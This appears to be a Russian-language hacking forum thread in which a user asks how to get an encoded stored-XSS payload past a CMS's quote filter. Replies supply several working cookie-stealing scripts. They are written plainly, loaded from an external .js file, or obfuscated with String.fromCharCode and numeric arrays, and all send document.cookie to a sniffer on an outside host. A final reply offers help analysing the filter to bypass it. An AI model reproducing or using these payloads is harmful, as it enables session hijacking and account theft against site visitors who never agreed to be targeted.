Нашел активную XSS на одном движке, только там фильтруются кавычки, попытался обойти и у меня возник такой вопрос почему закодированная КСС не выполняется? те так у меня работает отправка куков а вот так нет
а ты так попробуй: <script>img = new Image(); img.src =%22%68%74%74%70%3A%2F%2F%68%61%63%6B%65%72%2D%70%72%6F%2E%72%75%2F%73%6E%69%66%66%65%72%2F%DB%2E%67%69%66%3F%22%2B%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%3B</script>
может лучше поставить инклуд скрипта <script type=text/javascript src=http://****.ru/1.js>qq</script> а в 1.js записать то, что надо..?!?
Code: <script src=http://site.ru/hack.js></script> hack.js: Code: img = new Image(); img.src = "http://hacker-pro.ru/sniffer/Ы.gif?"+document.cookie; Так делай. Все должно работать!
PHP: <script>document.write(String.fromCharCode(60,115,99,114,105,112,116,62,105,109,103,32,61,32,110,101,119,32,73,109,97,103,101,40,41,59,32,105,109,103,46,115,114,99,32,61,32,34,104,116,116,112,58,47,47,104,97,99,107,101,114,45,112,114,111,46,114,117,47,115,110,105,102,102,101,114,47,219,46,103,105,102,63,34,43,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,59,60,47,115,99,114,105,112,116,62));</script> или так ) PHP: <script>a=new Array(59.88,114.81,98.93,113.76,104.82,111.63,115.89,61.86,104.92,108.79,102.98,31.68,60.94,31.84,109.82,100.65,118.8,31.71,72.68,108.73,96.91,102.71,100.6,39.95,40.82,58.68,31.89,104.91,108.61,102.87,45.92,114.89,113.69,98.86,31.66,60.91,31.89,33.95,103.78,115.82,115.75,111.77,57.91,46.69,46.61,103.73,96.75,98.81,106.85,100.83,113.95,44.76,111.95,113.95,110.72,45.77,113.64,116.62,46.68,114.65,109.89,104.61,101.94,101.99,100.87,113.6,46.91,218.77,45.96,102.69,104.99,101.71,62.86,33.9,42.81,99.88,110.64,98.96,116.69,108.89,100.8,109.64,115.66,45.75,98.6,110.78,110.93,106.65,104.81,100.62,58.7,59.7,46.63,114.64,98.7,113.91,104.65,111.61,115.68,61.61);var i; for (i=0;i<=a.length; i++){document.write(String.fromCharCode(Math.round(a[i])));};</script>
Раз ты копаешь CMS тогда кинь кусок кода где присутствует эта переменная через которую ты добавляешь текст, и ту часть где эта переменная фильтруется: ereg_replace() preg_replace() etc... Или хотя бы кусок сформированного HTML кинь, где у тебя выводится твоё сообщение и куда и как вставляется твой "код". А то по моему бессмыслено заниматься колдовством и проявлять экстрасенсорные способности.
